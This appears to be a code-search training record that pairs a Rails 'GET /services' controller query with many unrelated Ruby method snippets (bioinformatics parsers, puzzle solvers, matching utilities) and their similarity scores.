"def output_idmap(refseq_data, up)\n taxid = refseq_data[:taxid]\n gene_label_url = URI.escape(refseq_data[:gene_label])\n up = up.split(\"-\").first if up.index(\"-\") # with \"-\" means isoform's ID. expect to protein's ID\n\n unless $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"]\n $output_ttl.puts triple(\"<http://togogenome.org/gene/#{taxid}:#{gene_label_url}>\", \"rdfs:seeAlso\", \"upid:#{up}\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdf:type\", \"<http://identifiers.org/uniprot>\")\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"up:#{up}\")\n $output_ttl.puts triple(\"up:#{up}\", \"dct:publisher\", \"<http://identifirs.org/miriam.resource/MIR:00100134>\") # UniProt (www.uniprot.org)\n $output_ttl.puts triple(\"upid:#{up}\", \"rdfs:seeAlso\", \"tax:#{taxid}\")\n $gene_up_list[\"#{refseq_data[:gene_rsrc]}:#{up}\"] = true # to prevent duplicate output\n $taxid_list[taxid] = true\n end\nend",
"def find_different weights\n counts = Hash.new 0\n weights.each do |x|\n counts[x] += 1\n end\n k, _ = counts.rassoc 1\n k\nend",
"def uniqueSequences file\n\n seqIDs = {}\n printSeq = 1\n File.open(file,\"r\") do |f|\n while l = f.gets\n if l[0] == \">\"\n key = l.split(\"\\n\")[0].split(\" \")[0]\n if seqIDs.has_key? key\n printSeq = 0\n else\n seqIDs[\"#{key}\"] = 0\n printSeq = 1\n puts l\n end\n elsif printSeq == 1\n puts l\n end\n end\n end\n\n end",
"def match_errors(errors, doc)\n error_map = {}\n error_id = 0\n @error_attributes = []\n locs = errors.collect{|e| e.location}\n locs.compact!\n\n locs.each do |location|\n node = REXML::XPath.first(doc ,location)\n if(node)\n elem = node\n if node.class == REXML::Attribute\n @error_attributes << node\n elem = node.element\n end\n if elem\n unless elem.attributes['error_id']\n elem.add_attribute('error_id',\"#{error_id}\") \n error_id += 1\n end\n error_map[location] = elem.attributes['error_id']\n end\n end\n end\n\n error_map\n end",
"def find_replicates(params)\n unless ( params[:geoid_string].nil? ^ params[:geoid_file].nil?) then\n fr_puts \"Received both a :geoid_string and :geoid_file parameter--exactly one is required! Aborting!\"\n throw :needs_exactly_one_geoid_string_or_file\n end\n @batchmode = ! params[:geoid_file].nil?\n # If running in batch, set up the file to get geoids from\n if @batchmode then\n f = File.new(params[:geoid_file])\n else\n f = [params[:geoid_string]]\n end \n output_basedir = Dir.new(params[:output_dir])\n # This ought to be a constant\n no_db_commits = params[:no_db_commits]\n @calling_command = params[:calling_command]\n\n all_infos = [] # All info hashs discovered \n # Only save list of marshalled infos if in batchmode\n marshal_list = File.new(File.join(output_basedir.path, \"marshal_list.txt\"), \"w\") if @batchmode\n \n # For each line in the file (or the single array entry)\n # figure out what the geoids ought to be and stick them in a hash\n f.each { |line|\n line.chomp!\n (pid, gse, gsms, target_column, sdrf) = line.split(/\\t/)\n gsms = gsms.split(/,/)\n \n info = {} # Hash containing calculated geoid information\n info[:pid] = pid\n\n header = parse_sdrf(sdrf)\n s = header.reverse\n\n fr_puts \"modencode_#{pid} has #{gsms.size.inspect} GSMs\" \n fr_puts \"and we have #{header[0].rows.inspect} rows\"\n\n if gsms.size != header[0].rows then\n raise Exception.new(\"Must supply as many GSMS as rows! SDRF has #{header[0].rows} rows, but received #{gsms.size} GSMS.\")\n end\n\n column_specified = false\n target_column = target_column.to_i\n \n colname = header[target_column].name\n if colname =~ /geo/i then\n fr_puts \"Using existing GEOid column #{colname}\"\n else\n fr_puts \"Using protocol #{header[target_column].split_example}.\"\n column_specified = true\n end\n\n # if it's not geo, use it as protocol:\n if( column_specified ) then \n \n # get previous_protocol (ie target) and the one after it\n previous_protocol = header[target_column]\n previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = header.slice(target_column +1, header.length).find{|col| col.heading =~ /Protocol REF/i}\n next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n\n\n geo_record = SDRFHeader.new(\"Result Value\", \"geo record\") # make a new column\n # populate the geo record\n gsms.each_index{|i|\n geo_record.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_record.values.join(\", \") \n i = next_protocol.nil? ? header.size : header.find_index(next_protocol)\n header.insert(i, geo_record)\n fr_puts \" Attach GEO IDs to protocol: '#{previous_protocol.to_s}'\" \n else # there must be a geo colunn\n\n # finding a geo header index.\n geo_header_idx = s.find_index { |h| h.name =~ /geo/i }\n\n if geo_header_idx then\n previous_protocol = s.slice(geo_header_idx, s.length).find { |col| col.heading =~ /Protocol REF/i }; previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = s.slice(0, geo_header_idx).reverse.find { |col| col.heading =~ /Protocol REF/i }; next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n # Attach GEO IDs to existing GEO ID column\n fr_puts \" Found existing GEO ID column for #{pid} between: '#{previous_protocol_name.to_s}' AND '#{next_protocol_name.to_s}'\" \n sdrf_rows = s[geo_header_idx].rows\n geo_header_col = s[geo_header_idx]\n\n if sdrf_rows != gsms.size then\n raise Exception.new(\"Can't match #{sdrf_rows} SDRF rows to #{gsms.size} GEO ids!\")\n \n ## Attach GEO IDs, lining up duplicates with the previous row in the SDRF with the appropriate number of unique values\n #fr_puts \" There are more rows in the SDRF than GSM IDs: #{sdrf_rows} != #{gsms.size}.\" \n # Have to line this up carefully\n #uniq_rows = enough_replicates_at.uniq_rows\n #fr_puts \" Unique rows for #{enough_replicates_at.heading} [#{enough_replicates_at.name}]: \" + uniq_rows.pretty_inspect \n #geo_header_col.values.clear\n #uniq_rows.each_index { |is_idx|\n # uniq_rows[is_idx].each { |i|\n # geo_header_col.values[i] = gsms[is_idx]\n # }\n #}\n #fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n else\n # Attach GEO IDs to the SDRF in order\n geo_header_col.values.clear\n gsms.each_index { |i|\n geo_header_col.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n end\n geo_record = geo_header_col\n else # No protocol column and no geo header idx. should never happen.\n raise Exception.new(\"No protocol column or existing GEO column was specified. This should never happen!\")\n end\n end\n\n # If batchmode, make the project's subfolder within out\n output_sdrfdir = @batchmode ? File.join(output_basedir.path, pid.to_s) : output_basedir.path \n FileUtils.mkdir_p(output_sdrfdir)\n out_sdrf = File.join(output_sdrfdir, File.basename(sdrf))\n\n # Create new SDRF, overwriting existing sdrf only if not in batchmode\n print_sdrf(header, out_sdrf, !@batchmode)\n\n info[:geo_header_col] = geo_header_col\n info[:geo_record] = geo_record\n info[:previous_protocol_name] = previous_protocol_name\n\n # stick info in the hash to be remembered\n all_infos << info\n # Write a marshal file\n marshal_filename = GEOID_MARSHAL\n out_marshal = File.join(output_sdrfdir, marshal_filename) \n marshal_file = File.new(out_marshal, \"w\")\n marshal_file.puts(Marshal.dump(info))\n marshal_file.close\n \n marshal_list.puts File.join(pid.to_s, marshal_filename) if @batchmode \n \n } \n \n marshal_list.close if @batchmode\n \n # Then, run the database stuff on all_infos\n attached_geoids = update_db(all_infos, no_db_commits)\n attached_geoids\n end",
"def motif_enumeration(dna, k, d)\n # Given a collection of strings Dna and an integer d, a k-mer is a (k,d)-motif if it appears \n # in every string from Dna with at most d mismatches. For example, the implanted 15-mer in the \n # strings above represents a (15,4)-motif.\n\n # Implanted Motif Problem: Find all (k, d)-motifs in a collection of strings.\n # Input: A collection of strings Dna, and integers k and d.\n # Output: All (k, d)-motifs in Dna.\n\n # MOTIFENUMERATION(Dna, k, d)\n # Patterns ← an empty set\n # for each k-mer Pattern in Dna\n # for each k-mer Pattern’ differing from Pattern by at most d\n # mismatches\n # if Pattern' appears in each string from Dna with at most d\n # mismatches\n # add Pattern' to Patterns\n # remove duplicates from Patterns\n # return Patterns \n\n patterns = []\n (0..(dna[0].length-k)).each do |i|\n kmer = dna[0].slice(i,k)\n # puts \"kmer:\" + kmer\n iterative_neighbors(kmer, d).each do |pattern1|\n # puts \"Pattern1: \" + pattern1\n present_in_all = 1\n (1..(dna.length-1)).each do |j|\n # puts \"#{j}:\" + approx_pattern_matching(pattern1, dna[j], d).join(\" \")\n # puts \"#{j}:\" + approx_pattern_matching(pattern1, dna[j], d).length.to_s\n present_in_all = 0 if approx_pattern_matching(pattern1, dna[j], d).length == 0\n end\n if present_in_all == 1\n patterns << pattern1 unless patterns.include?(pattern1)\n end\n end\n end\n\n return patterns\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def matches\n m = (1..9).map { |i| ss[i] }\n m.pop until m[-1] or m.empty?\n m\n end",
"def ensure_adjacent_rooms(map)\n map.each do |row|\n x_coordinate = map.index(row)\n row.each do |room|\n index = map[row].index(room)\n puts index\n end\n\n \n # x_coordinates = row.collect! { |room| room = row.index(room) }\n \n # x_coordinates.each { |coordin| puts coordin } \n # \n # row.each { |coordin| puts coordin } \n end\nend",
"def find_uniqueness_constraints mapping\n return [] unless mapping.object_type.is_a?(MM::EntityType)\n\n start_roles =\n mapping.\n object_type.\n all_role. # Includes objectification roles for objectified fact types\n select do |role|\n (role.is_unique || # Must be unique on near role\n role.fact_type.is_unary) && # Or be a unary role\n (!role.fact_type.is_a?(MM::TypeInheritance) || included_subtype(role))\n end.\n map(&:counterpart). # (Same role if it's a unary)\n compact. # Ignore nil counterpart of a role in an n-ary\n map(&:base_role). # In case it's a link fact type\n uniq\n\n pcs =\n start_roles.\n flat_map(&:all_role_ref). # All role_refs\n map(&:role_sequence). # The role_sequence\n uniq.\n flat_map(&:all_presence_constraint).\n uniq.\n reject do |pc|\n pc.max_frequency != 1 || # Must be unique\n pc.enforcement || # and alethic\n pc.role_sequence.all_role_ref.detect do |rr|\n !start_roles.include?(rr.role) # and span only valid roles\n end || # and not be the full absorption path\n ( # Reject a constraint that caused full absorption\n pc.role_sequence.all_role_ref.size == 1 and\n mapping.is_a?(MM::Absorption) and\n fa = mapping.full_absorption and\n fa.mapping.is_a?(MM::Absorption) and\n pc.role_sequence.all_role_ref.single.role.base_role == fa.mapping.parent_role.base_role\n )\n end # Alethic uniqueness constraint on far end\n\n non_absorption_pcs = pcs.reject do |pc|\n # An absorption PC is a PC that covers some role that is involved in a FullAbsorption\n full_absorptions =\n pc.\n role_sequence.\n all_role_ref.\n map(&:role).\n flat_map do |role|\n (role.all_absorption_as_parent_role.to_a + role.all_absorption_as_child_role.to_a).\n select do |abs|\n abs.full_absorption && abs.full_absorption.composition == @composition\n end\n end\n full_absorptions.size > 0\n end\n pcs = non_absorption_pcs\n\n trace :relational_paths, \"Uniqueness Constraints for #{mapping.name}\" do\n pcs.each do |pc|\n trace :relational_paths, \"#{pc.describe.inspect}#{pc.is_preferred_identifier ? ' (PI)' : ''}\"\n end\n end\n\n pcs\n end",
"def isogram_matcher(isogram1, isogram2)\n #number of letters matched @ same position\n #iterate through the string, if element in isogram1 == element in isogram 2, increase letter match\n #number of leters matched\n #chars isogram1 and iterate through array\n #if element in isogram1 is in isogram2, increase count\n # return letters matched at same position and numbers matched in array\n\n idx_match = 0\n letter_match = 0\n\n isogram1.chars.each_with_index do |letter, idx|\n if letter == isogram2[idx]\n idx_match += 1\n elsif isogram2.include?(letter)\n letter_match += 1\n end\n end\n\n [idx_match, letter_match]\n\nend",
"def beUniqify\n\t\tres = Solver::Solver.uniqify(@indicesLigne,@indicesColonne)\n\t\t@indicesLigne = res[0]\n\t\t@indicesColonne = res[1]\n\t\t@grade = res[2]\n\tend",
"def mark_validly_repeated_pages\n\n fids = {}\n @sequence.each do |entry|\n next unless is_page? entry\n fids[entry.fid] ||= []\n fids[entry.fid].push entry\n end\n\n fids.keys.each do |k|\n if fids[k].length > 1\n fids[k][0..-2].each { |e| e.valid_repeat = true } # don't mark the last one, it's the one we will eventually include in the sequence to ingest\n end\n end\n\n image_filenames = {}\n @sequence.each do |entry|\n next unless is_page? entry\n image_filenames[entry.image_filename] ||= []\n image_filenames[entry.image_filename].push entry\n end\n\n image_filenames.keys.each do |k|\n if image_filenames[k].length > 1\n image_filenames[k][0..-2].each { |e| e.valid_repeat = true } # don't mark the last one, it's the one we will eventually include in the sequence to ingest\n end\n end\n end",
"def initialize(matching_index, pointer)\n # Matching files with other indexes than CRC\n # map< ( file_info | segment_info ), matching_pointer_info >\n # map< ( FileInfo | SegmentInfo ), MatchingIndexSinglePointer >\n @matching_files = {}\n @crc_matching_files = {}\n @score_max = compute_score_max(pointer)\n # First find CRC matching files\n if (matching_index.indexes.has_key?(:crc))\n matching_index.indexes[:crc].each do |data, lst_pointers|\n @crc_matching_files.concat(lst_pointers)\n end\n end\n # Then all other indexes\n matching_index.indexes.each do |index_name, index_data|\n if (index_name != :crc)\n index_data.each do |data, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFFS[index_name]\n @matching_files[matching_pointer].indexes[index_name] = [] if (!@matching_files[matching_pointer].indexes.has_key?(index_name))\n @matching_files[matching_pointer].indexes[index_name] << data\n end\n end\n end\n end\n end\n matching_index.segments_metadata.each do |segment_ext, segment_ext_data|\n segment_ext_data.each do |metadata_key, metadata_data|\n metadata_data.each do |metadata_value, lst_pointers|\n lst_pointers.each do |matching_pointer|\n if (!@crc_matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer] = MatchingIndexSinglePointer.new if (!@matching_files.has_key?(matching_pointer))\n @matching_files[matching_pointer].score += COEFF_SEGMENT_METADATA\n @matching_files[matching_pointer].segments_metadata[segment_ext] = {} if (!@matching_files[matching_pointer].segments_metadata.has_key?(segment_ext))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] = [] if (!@matching_files[matching_pointer].segments_metadata[segment_ext].has_key?(metadata_key))\n @matching_files[matching_pointer].segments_metadata[segment_ext][metadata_key] << metadata_value\n end\n end\n end\n end\n end\n # Find matching blocks' CRC sequences\n lst_crc = (pointer.is_a?(FileInfo) ? pointer.crc_list : pointer.segment.crc_list)\n @matching_files.each do |matching_pointer, matching_info|\n if (matching_info.indexes.has_key?(:block_crc))\n lst_common_crc = matching_info.indexes[:block_crc]\n # Get the list of blocks' CRC from the file\n lst_matching_crc = (matching_pointer.is_a?(FileInfo) ? matching_pointer.crc_list : matching_pointer.segment.crc_list)\n # Parse the original file and get to a matching CRC\n idx_crc = 0\n while (idx_crc < lst_crc.size)\n while ((idx_crc < lst_crc.size) and\n (!lst_common_crc.include?(lst_crc[idx_crc])))\n idx_crc += 1\n end\n if (idx_crc < lst_crc.size)\n first_crc = lst_crc[idx_crc]\n # We are at the beginning of a sequence in the original file.\n smallest_sequence_size = lst_crc.size - idx_crc\n # Find all the occurences of this sequence in the matching file.\n lst_matching_crc.each_with_index do |matching_crc, idx_matching_crc|\n if (matching_crc == first_crc)\n # We are at the beginning of a sequence in the matching file\n idx_sequence = 1\n # Get the matching sequence\n matching_sequence = [first_crc]\n while ((idx_crc+idx_sequence < lst_crc.size) and\n (idx_matching_crc+idx_sequence < lst_matching_crc.size) and\n (lst_crc[idx_crc+idx_sequence] == lst_matching_crc[idx_matching_crc+idx_sequence]))\n matching_sequence << lst_crc[idx_crc+idx_sequence]\n idx_sequence += 1\n end\n if (matching_sequence.size > 1)\n # There is a matching sequence\n offset = idx_crc*FileInfo::CRC_BLOCK_SIZE\n matching_info.block_crc_sequences[offset] = {} if (!matching_info.block_crc_sequences.has_key?(offset))\n matching_info.block_crc_sequences[offset][idx_matching_crc*FileInfo::CRC_BLOCK_SIZE] = matching_sequence\n smallest_sequence_size = matching_sequence.size if (matching_sequence.size < smallest_sequence_size)\n # For each successful sequence, increase the score\n matching_info.score += (COEFF_BLOCK_CRC_SEQUENCE * matching_sequence.size)\n end\n end\n end\n idx_crc += smallest_sequence_size\n end\n end\n end\n end\n end",
"def sdrm_nrti(aa_array,start_aa=1)\n out_hash = {}\n sdrm = {}\n sdrm[41] = ['M',['L']]\n sdrm[65] = ['K',['R']]\n sdrm[67] = ['D',['N','G','E']]\n sdrm[69] = ['T',['D']]\n sdrm[70] = ['K',['R','E']]\n sdrm[74] = ['L',['V','I']]\n sdrm[75] = ['V',['M','T','A','S']]\n sdrm[77] = ['F',['L']]\n sdrm[115] = ['Y',['F']]\n sdrm[116] = ['F',['Y']]\n sdrm[151] = ['Q',['M']]\n sdrm[184] = ['M',['V','I']]\n sdrm[210] = ['L',['W']]\n sdrm[215] = [\"T\",[\"Y\",\"F\",\"I\",\"C\",\"D\",\"V\",\"E\",\"S\"]]\n sdrm[219] = [\"K\",[\"Q\",\"E\",\"N\",\"R\"]]\n aa_length = aa_array.size\n end_aa = start_aa + aa_length - 1\n (start_aa..end_aa).each do |position|\n array_position = position - start_aa\n if sdrm.keys.include?(position)\n wt_aa = sdrm[position][0]\n test_aa = aa_array[array_position]\n if test_aa.size == 1\n unless wt_aa == test_aa\n if sdrm[position][1].include?(test_aa)\n out_hash[position] = [wt_aa,test_aa]\n end\n end\n else\n test_aa_array = test_aa.split(\"/\")\n if (test_aa_array & sdrm[position][1])\n out_hash[position] = [wt_aa,test_aa]\n end\n end\n\n end\n end\n return out_hash\nend",
"def uniq_index\n\t\t\t\tcreate_property :in, type: :link, linked_class: :V\n\t\t\t\tcreate_property :out, type: :link, linked_class: :V\n\t\t\t\tcreate_index \"#{ref_name}_idx\", on: [ :in, :out ]\n\t\t\tend",
"def pick_patients\n $genes = Hash.new {|hash, key| hash[key] = Set.new() }\n $hide_pat = Hash.new {|hash, key| hash[key] = Set.new() }\n $avail_pat = Hash.new {|hash, key| hash[key] = Set.new() }\n\n pick_pat = Set.new($all_avail_pat.keys.sample(($HIDE_PERCENT*$all_avail_pat.size).to_i))\n $all_avail_pat.each_key do |pat|\n if pick_pat.include? pat\n $hide_pat[pat] = $all_avail_pat[pat]\n else\n $avail_pat[pat] = $all_avail_pat[pat]\n $avail_pat[pat].each { |gene| $genes[gene] << pat }\n end\n end\nend",
"def check_for_uncommon_properties(error_array, property_hash)\n rarity_factor_cutoff = 5\n property_type_count = property_hash.keys().length()\n total_property_count = 0\n property_hash.keys().each do |key|\n total_property_count += property_hash[key].length()\n end\n property_hash.keys().each do |key|\n if property_hash[key].length() < (total_property_count / property_type_count) / rarity_factor_cutoff \n property_hash[key].each do |line|\n error_array.push(line)\n end\n end\n end\nend",
"def get_unique_permutations annotation_time_slot\r\n\t\treturn annotation_time_slot.uniq.permutation.to_a\r\n\tend",
"def find_exact_match\n exact = 0\n index = 0\n 4.times.map do\n if @temp_code[index] == @temp_guess[index]\n exact += 1\n @temp_code.delete_at(index)\n @temp_guess.delete_at(index)\n else\n index += 1\n end\n end\n exact\n end",
"def matches(max_mismatches)\n out = []\n\n (0..text_len-patt_len).each do |i|\n out << i if quasi_match?(i, max_mismatches)\n end\n\n out\n end",
"def antimoniker(io)\n { count: io.read(4).unpack('V').first } # count (4 bytes): An unsigned integer that specifies the number of anti-monikers that have been composed together to create this instance. When an anti-moniker is composed with another anti-moniker, the resulting composition would have a count field equaling the sum of the two count fields of the composed anti-monikers. This value MUST be less than or equal to 1048576.\n end",
"def find_claiming_pair\n iterator((1..3)){|col,line|\n scan_claiming_pair_line(col,line)\n reduce_solved\n scan_claiming_pair_col(col,line)\n reduce_solved\n }\n self\n end",
"def possible_fields(map, nums)\n result = Set.new()\n map.each do |field, ranges|\n if all_in_ranges?(nums, ranges)\n result << field \n end\n end\n result\nend",
"def nucleotide_counts\n hash = {}\n @valid_inputs.each do |i|\n hash[i] = @dna.count i\n end\n hash\n end",
"def redundancy(array, sensitive=true)\n if sensitive == false\n array = lower(array)\n end\n base = array.to_a.sort! { |x, y| x.to_s <=> y.to_s }.uniq\n occurence = {}\n n, b = 0, 0\n base.each do |x|\n while x == array[n]\n n += 1\n end\n occurence[x] = n - b\n b = n\n end\n puts occurence\nend",
"def missing_values(a)\n hash_values = {}\n a.each {|nb| hash_values[nb] = a.count(nb) }\n hash_values.delete_if {|nb, count| count == 3 }\n once, twice = 0, 0\n hash_values.each do |nb, count|\n once = nb if count == 1\n twice = nb if count == 2\n end\n once * once * twice\nend",
"def parse_kanjidic lines\n line_number=1\n # get id values from the tables for the various attributes such as kunyomi, onyomi etc\n # to be used in the join tables \n readings_to_import= {}\n @lookup_attributes.each do |column|\n #stores readings in a hash of arrays with the key being\n #the attribute name e.g. :nanori, :kunyomi, etc\n readings_to_import[column]=[]\n end \n\n\n #create empty arrays to store index values\n indexes_to_import= [] #2D array of [[dictionary_id, kanji_id, index_value],...]\n\n lines.each do |line|\n unless line_number == 1\n kanji = get_element(:kanji,line)\n kanji_id = @kanji_lookup[kanji]\n #for each of nanori, onyomi, meanings, pinyin etc\n @lookup_attributes.each do |column| \n #get each of the multiple value attributes and append them to an array \n #to import at the end\n klass = eval(column.to_s.capitalize)\n relation_klass = eval(column.to_s.capitalize.pluralize+\"Kanji\")\n lookup = \"@#{column}_lookup\"\n #puts lookup\n lookup = eval(lookup)\n\n values = get_element(column, line)\n values.each do |value|\n #e.g. equivalent to o=Onyomi.find_by_onyomi onyomi\n relation_id = lookup[value]\n # e.g. equivalent to array << OnyomisKanji.new(:kanji_id=>id,:onyomi_id =>o.id)\n readings_to_import[column] << [kanji_id ,relation_id]\n end\n end \n\n #for the indexes we have a KanjiIndex table an Dictionaries table\n #and a KanjiIndex has a dictionary_id column\n @index_names.each do |index_name|\n indexes_to_import += get_dictionary_index(index_name, line)\n end\n\n end\n line_number +=1\n end\n return readings_to_import, indexes_to_import\n end",
"def unify_dup_verts\n # might be more memory efficient to use the index, though this method is simpler\n \n matches = []\n duplicates = Hash.new\n i = -1\n summary = @vbuffer.buffer.to_a.map { |t| t << i += 1 }.sort!\n # summary = NArray.hcat(@vbuffer.buffer, NArray[0...@vbuffer.buffer.shape.last].reshape(1,@vbuffer.buffer.shape.last)).to_a.sort!\n complete = false\n \n until complete do\n (v = summary.shift) or (complete = true) # loop must run once more than there are items in summary\n if (v[2] == matches.last[2] && v[1] == matches.last[1] && v[0] == matches.last[0] rescue false)\n matches << v\n elsif matches.count > 1\n dups = matches.map(&:last)\n primary = dups.shift\n duplicates[primary] = dups\n \n # Replace normal of primary duplicate with an average of the normals of all duplicates\n @vnbuffer.update primary => @vnbuffer.avg_normal(dups)\n \n matches = [v]\n else\n duplicates[matches.first.last] = [] if matches.first\n matches = [v]\n end\n end\n primaries = duplicates.keys.sort!\n secondaries = duplicates.values.flatten.sort!\n \n # Build a map from indices of duplicates onto primary indices remapped for the removal of secondary duplicates \n index_map = Hash.new\n p = s = 0\n while p < primaries.size\n s += 1 while (primaries[p] > secondaries[s] rescue false)\n index_map[primaries[p]] = primaries[p] - s\n duplicates[primaries[p]].each { |sec| index_map[sec] = primaries[p] - s }\n p += 1\n end\n \n # update buffers\n @vbuffer.remove_and_optimize secondaries\n @vnbuffer.remove_and_optimize secondaries\n @fbuffer.remap index_map\n [@vbuffer, @vnbuffer, @fbuffer].each { |b| b.build_index }\n self\n end",
"def known_invalid_idref(mapkey, oldid)\n\treturn false;\n\t# \treturn ( ((mapkey==:version or mapkey==:fixfor) and oldid==21907 or oldid==21881 or oldid==21743) or\n\t# \t\t\t(mapkey==:version and (oldid==21240 or oldid==21743)) or \n\t# \t\t\t(mapkey==:issuestatus and (oldid==2 or oldid==-3)) or\n\t# \t\t\t(mapkey==:resolution and oldid==6)\n\t# \t )\nend",
"def conflicts\n @grid.values.select { |claims| claims.size > 1 }\n end",
"def problem_79\n digits = []\n lines = open(\"keylog.txt\").reduce([]) do |a,l|\n a << l.chomp.split(//).map(&:to_i)\n end\n p = lines.transpose\n loop do \n first = (p[0] - p[1]).uniq\n if first.length == 1\n d = first[0]\n digits << d \n puts \"Remove #{d}\"\n # shift off leading 'd' values\n lines.select {|l| l[0] == d}.map {|l| l.shift; l.push nil }\n # Rebuild out first, second, third arrays\n p = lines.transpose\n return digits.map(&:to_s).join if p.flatten.compact.length == 0\n puts \"len = #{p.flatten.compact.length}\"\n else\n raise \"Trouble - 2 candidates : #{first.inspect}, rework algorithm\"\n end\n end\nend",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end"
] |
[
"0.65094244",
"0.6354108",
"0.57296443",
"0.5531168",
"0.54432726",
"0.54402244",
"0.54064965",
"0.5360847",
"0.5306777",
"0.527252",
"0.52692294",
"0.5225156",
"0.5133353",
"0.5085653",
"0.50643885",
"0.50435126",
"0.50378704",
"0.5035234",
"0.49929872",
"0.49865535",
"0.49697682",
"0.4964372",
"0.49612007",
"0.4956641",
"0.493248",
"0.4931533",
"0.48883837",
"0.48725623",
"0.48672688",
"0.4867254",
"0.48531386",
"0.48523074",
"0.48420313",
"0.48229152",
"0.47994918",
"0.47979245",
"0.47969908",
"0.47955465",
"0.47905958",
"0.47776252",
"0.47745028",
"0.47701082",
"0.47499034",
"0.4743056",
"0.4715303",
"0.46977043",
"0.46968576",
"0.4669405",
"0.4665471",
"0.46581677",
"0.46580502",
"0.464931",
"0.46411237",
"0.46410504",
"0.46389547",
"0.46377444",
"0.46363863",
"0.46350136",
"0.46340284",
"0.46231067",
"0.46214435",
"0.4614428",
"0.46105963",
"0.46021858",
"0.45884085",
"0.45878732",
"0.45858407",
"0.4584387",
"0.45823345",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45804432",
"0.45742446",
"0.45680216",
"0.45678994",
"0.45650622",
"0.4563955",
"0.45624518",
"0.45624304",
"0.45616433",
"0.45598108",
"0.4558317",
"0.4556638",
"0.45544174",
"0.45515963",
"0.4550756",
"0.45461014",
"0.45392558",
"0.45369408",
"0.45346522",
"0.45261237",
"0.45227346",
"0.45191744",
"0.45176324",
"0.45125693",
"0.45040688",
"0.44946417"
] |
0.5501095
|
4
|
GET /services GET /services.xml
|
def index
submenu_item 'services-index'
@services = Service.paginate query(:page => params[:page])
@service_types = ServiceType.all :select =>"distinct service_types.id, service_types.name, service_types.alias, service_types.serviceable_type", :joins => "inner join services t1 on t1.type_id = service_types.id and t1.tenant_id = #{current_user.tenant_id}"
status_tab
session[:service_summary] = @summary
respond_to do |format|
format.html # index.html.erb
format.xml { render :xml => @services }
format.csv {
send_data(@service.metric_data, :type => 'text/csv; header=present', :filename => 'chart_data.csv')
}
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def index\n endpoint(get(services_url).body)\n end",
"def list_services\n response = @http_client.get(prefix_path('services'))\n Response.new(response)\n end",
"def all(options = {})\n out = xml_run build_command('services', options.merge(:get => XML_COMMANDS_GET))\n convert_output(out.fetch(:stream, {}).fetch(:service_list, {}).fetch(:service, []), :service)\n end",
"def services\n params = { command: 'account_services' }\n get('/json.php', params)\n end",
"def service(id)\n request :get, \"/services/#{id}\"\n end",
"def services(query = {})\n get('service', query)\n end",
"def url\n resource.url + '/services'\n end",
"def show\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def get_services()\n return get_request(address(\"/OS-KSADM/services\"), token())\n end",
"def show\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def show\n @page_id = \"services\"\n @service = Service.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def list_services\n @services\n end",
"def get_services\n reply = @client.call(:get_services)\n\n data = reply.body.dig(:get_services_response,\n :get_services_result,\n :array_of_string)\n data = check_if_data_exists(data)\n\n data.map do |attrs|\n {\n id: Integer(attrs[:string][0], 10),\n name: attrs[:string][1]\n }\n end\n end",
"def services\n\t\tService.find(:all)\n\tend",
